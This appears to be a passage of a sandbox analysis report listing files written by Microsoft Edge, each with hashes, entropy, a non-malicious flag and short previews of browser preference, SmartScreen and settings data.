                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):44455
                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.089779405179669
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWzdi1zNtPMJkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNOkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                    MD5:5915190E94C5F0C68D2F6101F4510098
                                                                                                                                                                                                                                                                                                    SHA1:EA5484700EC7DB3882F6B326DB405EE49DC5AD96
                                                                                                                                                                                                                                                                                                    SHA-256:E1241004A7AF4EC5CBFE3E8CBAC6CFBDA28A556753E099A96C9CA05371744B81
                                                                                                                                                                                                                                                                                                    SHA-512:E76AEEA6159668E4EFF5E7298E423A9366A8661C2650616D5D2EABF56A02BF1E42DA36D217C8D0440E0BBDE1178184A69061512A647B4AC0FA30DFBFBEE3C78D
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):44455
                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.089779405179669
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWzdi1zNtPMJkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNOkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                    MD5:5915190E94C5F0C68D2F6101F4510098
                                                                                                                                                                                                                                                                                                    SHA1:EA5484700EC7DB3882F6B326DB405EE49DC5AD96
                                                                                                                                                                                                                                                                                                    SHA-256:E1241004A7AF4EC5CBFE3E8CBAC6CFBDA28A556753E099A96C9CA05371744B81
                                                                                                                                                                                                                                                                                                    SHA-512:E76AEEA6159668E4EFF5E7298E423A9366A8661C2650616D5D2EABF56A02BF1E42DA36D217C8D0440E0BBDE1178184A69061512A647B4AC0FA30DFBFBEE3C78D
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):44455
                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.089779405179669
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWzdi1zNtPMJkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNOkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                    MD5:5915190E94C5F0C68D2F6101F4510098
                                                                                                                                                                                                                                                                                                    SHA1:EA5484700EC7DB3882F6B326DB405EE49DC5AD96
                                                                                                                                                                                                                                                                                                    SHA-256:E1241004A7AF4EC5CBFE3E8CBAC6CFBDA28A556753E099A96C9CA05371744B81
                                                                                                                                                                                                                                                                                                    SHA-512:E76AEEA6159668E4EFF5E7298E423A9366A8661C2650616D5D2EABF56A02BF1E42DA36D217C8D0440E0BBDE1178184A69061512A647B4AC0FA30DFBFBEE3C78D
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):44455
                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.089779405179669
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWzdi1zNtPMJkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNOkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                    MD5:5915190E94C5F0C68D2F6101F4510098
                                                                                                                                                                                                                                                                                                    SHA1:EA5484700EC7DB3882F6B326DB405EE49DC5AD96
                                                                                                                                                                                                                                                                                                    SHA-256:E1241004A7AF4EC5CBFE3E8CBAC6CFBDA28A556753E099A96C9CA05371744B81
                                                                                                                                                                                                                                                                                                    SHA-512:E76AEEA6159668E4EFF5E7298E423A9366A8661C2650616D5D2EABF56A02BF1E42DA36D217C8D0440E0BBDE1178184A69061512A647B4AC0FA30DFBFBEE3C78D
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                    MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                    SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                    SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                    SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):47
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                    MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                    SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                    SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                    SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):35
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                    MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                    SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                    SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                    SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):81
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                    MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                    SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                    SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                    SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):130439
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                    MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                    SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                    SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                    SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                    MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                    SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                    SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                    SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):57
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                    MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                    SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                    SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                    SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                    MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                    SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                    SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                    SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):575056
                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                    SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                    MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                    SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                    SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                    SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):460992
                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                    SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                    MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                    SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                    SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                    SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):9
